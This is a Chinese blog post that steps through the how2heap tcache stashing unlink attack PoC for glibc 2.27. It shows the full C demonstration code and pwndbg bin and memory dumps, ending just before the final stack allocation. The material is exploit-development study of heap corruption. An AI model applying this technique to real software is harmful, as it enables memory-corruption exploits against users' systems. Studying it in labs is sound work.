<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      Tcache_stashing_unlink_atack调试记录 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        Tcache_stashing_unlink_atack调试记录
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2021-09-01
      </span>

                                                                        <span class="post-pubtime"> 本文共1.5k字 </span>

                                                                        <span class="post-pubtime">
        大约需要13min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/PWN/" title="PWN">
            <b>#</b> PWN
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>代码是how2heap中libc2.27的代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> stack_var[<span class="number">0x10</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *chunk_lis[<span class="number">0x10</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> *target;</span><br><span class="line"></span><br><span class="line">    setbuf(<span class="built_in">stdout</span>, <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;This file demonstrates the stashing unlink attack on tcache.\n\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;This technique can be used when you are able to overwrite the victim-&gt;bk pointer. Besides, it&#x27;s necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we&#x27;ll create the chunk on the stack.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// stack_var emulate the fake_chunk we want to alloc to</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Stack_var emulates the fake chunk we want to alloc to.\n\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;First let&#x27;s write a writeable address to fake_chunk-&gt;bk to bypass bck-&gt;fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk-&gt;bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    stack_var[<span class="number">3</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)(&amp;stack_var[<span class="number">2</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;You can see the value of fake_chunk-&gt;bk is:%p\n\n&quot;</span>,(<span class="keyword">void</span>*)stack_var[<span class="number">3</span>]);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Also, let&#x27;s see the initial value of stack_var[4]:%p\n\n&quot;</span>,(<span class="keyword">void</span>*)stack_var[<span class="number">4</span>]);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Now we alloc 9 chunks with malloc.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//now we malloc 9 chunks</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>;i &lt; <span class="number">9</span>;i++)&#123;</span><br><span class="line">        chunk_lis[i] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>*)<span class="built_in">malloc</span>(<span class="number">0x90</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//put 7 chunks into tcache</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Then we free 7 of them in order to put them into tcache. Carefully we didn&#x27;t free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">3</span>;i &lt; <span class="number">9</span>;i++)&#123;</span><br><span class="line">        <span class="built_in">free</span>(chunk_lis[i]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;As you can see, chunk1 &amp; [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//last tcache bin</span></span><br><span class="line">    <span class="built_in">free</span>(chunk_lis[<span class="number">1</span>]);</span><br><span class="line">    <span class="comment">//now they are put into unsorted bin</span></span><br><span class="line">    <span class="built_in">free</span>(chunk_lis[<span class="number">0</span>]);</span><br><span class="line">    <span class="built_in">free</span>(chunk_lis[<span class="number">2</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//convert into small bin</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0xa0</span>);<span class="comment">// size &gt; 0x90</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//now 5 tcache bins</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x90</span>);</span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x90</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Now we emulate a vulnerability that can overwrite the victim-&gt;bk pointer into fake_chunk addr: %p.\n\n&quot;</span>,(<span class="keyword">void</span>*)stack_var);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//change victim-&gt;bck</span></span><br><span class="line">    <span class="comment">/*VULNERABILITY*/</span></span><br><span class="line">    chunk_lis[<span class="number">2</span>][<span class="number">1</span>] = (<span class="keyword">unsigned</span> <span class="keyword">long</span>)stack_var;</span><br><span class="line">    <span class="comment">/*VULNERABILITY*/</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//trigger the attack</span></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">calloc</span>(<span class="number">1</span>,<span class="number">0x90</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck-&gt;fd has been changed into a libc addr: %p\n\n&quot;</span>,(<span class="keyword">void</span>*)stack_var[<span class="number">2</span>],(<span class="keyword">void</span>*)stack_var[<span class="number">4</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//malloc and return our fake chunk on stack</span></span><br><span class="line">    target = <span class="built_in">malloc</span>(<span class="number">0x90</span>);   </span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;As you can see, next malloc(0x90) will return the region our fake chunk: %p\n&quot;</span>,(<span class="keyword">void</span>*)target);</span><br><span class="line"></span><br><span class="line">    assert(target == &amp;stack_var[<span class="number">2</span>]);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>那么就开始调试吧：</p>
<p>首先最开始有三个变量</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> info locals</span> </span><br><span class="line">stack_var = &#123;0 &lt;repeats 16 times&gt;&#125;</span><br><span class="line">chunk_lis = &#123;0x0 &lt;repeats 16 times&gt;&#125;</span><br><span class="line">target = 0x7ffff7dde39f &lt;_dl_lookup_symbol_x+319&gt;</span><br><span class="line">__PRETTY_FUNCTION__ = &quot;main&quot;</span><br></pre></td></tr></table></figure>

<p>之后将stack_var[2]的地址放入了stack_var[3]中的位置：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> info locals</span> </span><br><span class="line">stack_var = &#123;0, 0, 0, 140737488346768, 0 &lt;repeats 12 times&gt;&#125;</span><br><span class="line">chunk_lis = &#123;0x0 &lt;repeats 16 times&gt;&#125;</span><br><span class="line">target = 0x7ffff7dde39f &lt;_dl_lookup_symbol_x+319&gt;</span><br><span class="line">__PRETTY_FUNCTION__ = &quot;main&quot;</span><br></pre></td></tr></table></figure>

<p>至于为什么这么放，是个很有意思的问题，后面会揭晓，继续往下看：</p>
<p>再接下来就是连续malloc了9次，并将返回的地址放入了chunk_list中：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> info locals</span> </span><br><span class="line">i = 0</span><br><span class="line">stack_var = &#123;0, 0, 0, 140737488346768, 0 &lt;repeats 12 times&gt;&#125;</span><br><span class="line">chunk_lis = &#123;0x555555757260, 0x555555757300, 0x5555557573a0, 0x555555757440, 0x5555557574e0, 0x555555757580, 0x555555757620, 0x5555557576c0, 0x555555757760, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0&#125;</span><br><span class="line">target = 0x7ffff7dde39f &lt;_dl_lookup_symbol_x+319&gt;</span><br><span class="line">__PRETTY_FUNCTION__ = &quot;main&quot;</span><br></pre></td></tr></table></figure>

<p>然后将3到8的都free掉，tcache是FILO的，且每个最多放7个：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  6]: 0x555555757760 —▸ 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> info locals</span> </span><br><span class="line">stack_var = &#123;0, 0, 0, 140737488346768, 0 &lt;repeats 12 times&gt;&#125;</span><br><span class="line">chunk_lis = &#123;0x555555757260, 0x555555757300, 0x5555557573a0, 0x555555757440, 0x5555557574e0, 0x555555757580, 0x555555757620, 0x5555557576c0, 0x555555757760, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0&#125;</span><br><span class="line">target = 0x7ffff7dde39f &lt;_dl_lookup_symbol_x+319&gt;</span><br><span class="line">__PRETTY_FUNCTION__ = &quot;main&quot;</span><br></pre></td></tr></table></figure>

<p>在之后按照1,0,2的顺序free，放入unsorted bin中：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  7]: 0x555555757300 —▸ 0x555555757760 —▸ 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x555555757390 —▸ 0x555555757250 —▸ 0x7ffff7dcdca0 (main_arena+96) ◂— 0x555555757390</span><br><span class="line">smallbins</span><br><span class="line">empty</span><br><span class="line">largebins</span><br><span class="line">empty</span><br></pre></td></tr></table></figure>

<p>之后申请了0xa0大小的chunk，unsorted中没有这么大的，全部放入smallbin中，然后从top chunk切割：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  7]: 0x555555757300 —▸ 0x555555757760 —▸ 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0xa0: 0x555555757390 —▸ 0x555555757250 —▸ 0x7ffff7dcdd30 (main_arena+240) ◂— 0x555555757390</span><br><span class="line">largebins</span><br><span class="line">empty</span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> heap</span></span><br><span class="line">....</span><br><span class="line">...</span><br><span class="line">Free chunk (tcache) | PREV_INUSE</span><br><span class="line">Addr: 0x555555757750</span><br><span class="line">Size: 0xa1</span><br><span class="line">fd: 0x5555557576c0</span><br><span class="line"></span><br><span class="line">Allocated chunk | PREV_INUSE  &lt; == 新申请的0xa0大小的chunk</span><br><span class="line">Addr: 0x5555557577f0</span><br><span class="line">Size: 0xb1</span><br><span class="line"></span><br><span class="line">Top chunk | PREV_INUSE</span><br><span class="line">Addr: 0x5555557578a0</span><br><span class="line">Size: 0x20761</span><br></pre></td></tr></table></figure>

<p>然后是两个malloc(0x90)，从tcache中拿：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  5]: 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0xa0: 0x555555757390 —▸ 0x555555757250 —▸ 0x7ffff7dcdd30 (main_arena+240) ◂— 0x555555757390</span><br><span class="line">largebins</span><br><span class="line">empty</span><br></pre></td></tr></table></figure>

<p>stack_var的地址：0x7fffffffde80。</p>
<p>然后就是这句话：</p>
<p><code> chunk_lis[2][1] = (unsigned long)stack_var;</code></p>
<p>就是将stack_var的地址放入chunl_lis[2]所指的地址中</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> <span class="built_in">print</span> chunk_lis[2]</span> </span><br><span class="line"><span class="meta">$</span><span class="bash">4 = (unsigned long *) 0x5555557573a0</span></span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> <span class="built_in">print</span> chunk_lis[2][1]</span> </span><br><span class="line"><span class="meta">$</span><span class="bash">5 = 140737488346752 &lt; = 也就是0x7fffffffde80</span></span><br><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> <span class="built_in">print</span> &amp;chunk_lis[2][1]</span> </span><br><span class="line"><span class="meta">$</span><span class="bash">6 = (unsigned long *) 0x5555557573a8</span></span><br></pre></td></tr></table></figure>

<p>就是说，将0x7ffff7dcdd30写入了0x5555557573a8中</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> x/16gx 0x555555757390</span></span><br><span class="line">0x555555757390:	0x0000000000000000	0x00000000000000a1</span><br><span class="line">0x5555557573a0:	0x0000555555757250	0x00007fffffffde80</span><br><span class="line">0x5555557573b0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557573c0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557573d0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557573e0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x5555557573f0:	0x0000000000000000	0x0000000000000000</span><br><span class="line">0x555555757400:	0x0000000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>

<p>也就是说，这么一改将smallbin的链表打乱了：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  5]: 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0xa0 [corrupted]</span><br><span class="line">FD: 0x555555757390 —▸ 0x555555757250 —▸ 0x7ffff7dcdd30 (main_arena+240) ◂— 0x555555757390</span><br><span class="line">BK: 0x555555757250 —▸ 0x555555757390 —▸ 0x7fffffffde80 —▸ 0x7fffffffde90 ◂— 0x0</span><br><span class="line">largebins</span><br><span class="line">empty</span><br><span class="line"><span class="meta">pwndbg&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后是calloc(1,0x90)</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">pwndbg&gt;</span><span class="bash"> bin</span></span><br><span class="line">tcachebins</span><br><span class="line">0xa0 [  7]: 0x7fffffffde90 —▸ 0x5555557573a0 —▸ 0x5555557576c0 —▸ 0x555555757620 —▸ 0x555555757580 —▸ 0x5555557574e0 —▸ 0x555555757440 ◂— 0x0</span><br><span class="line">fastbins</span><br><span class="line">0x20: 0x0</span><br><span class="line">0x30: 0x0</span><br><span class="line">0x40: 0x0</span><br><span class="line">0x50: 0x0</span><br><span class="line">0x60: 0x0</span><br><span class="line">0x70: 0x0</span><br><span class="line">0x80: 0x0</span><br><span class="line">unsortedbin</span><br><span class="line">all: 0x0</span><br><span class="line">smallbins</span><br><span class="line">0xa0 [corrupted]</span><br><span class="line">FD: 0x555555757390 —▸ 0x5555557576c0 ◂— 0x0</span><br><span class="line">BK: 0x7fffffffde90 ◂— 0x0</span><br><span class="line">largebins</span><br><span class="line">empty</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>tcache bin 有剩余 (数量小于 <code>TCACHE_MAX_BINS</code> ) 时，同大小的 small bin 会放进 tcache 中 (这种情况可以用 <code>calloc</code> 分配同大小堆块触发，因为 <code>calloc</code> 分配堆块时不从 tcache bin 中选取)。在获取到一个 <code>smallbin</code> 中的一个 chunk 后会如果 tcache 仍有足够空闲位置，会将剩余的 small bin 链入 tcache ，在这个过程中只对第一个 bin 进行了完整性检查，后面的堆块的检查缺失。</p>
<p>所以，这次calloc的是0x555555757250这个chunk，而0x555555757390和0x7fffffffde80则放入了tcache中。</p>
<p>也就是说，这时stack_var[2]已经放入了tcache中，那么下次calloc即可得到位于stack的一个chunk：</p>
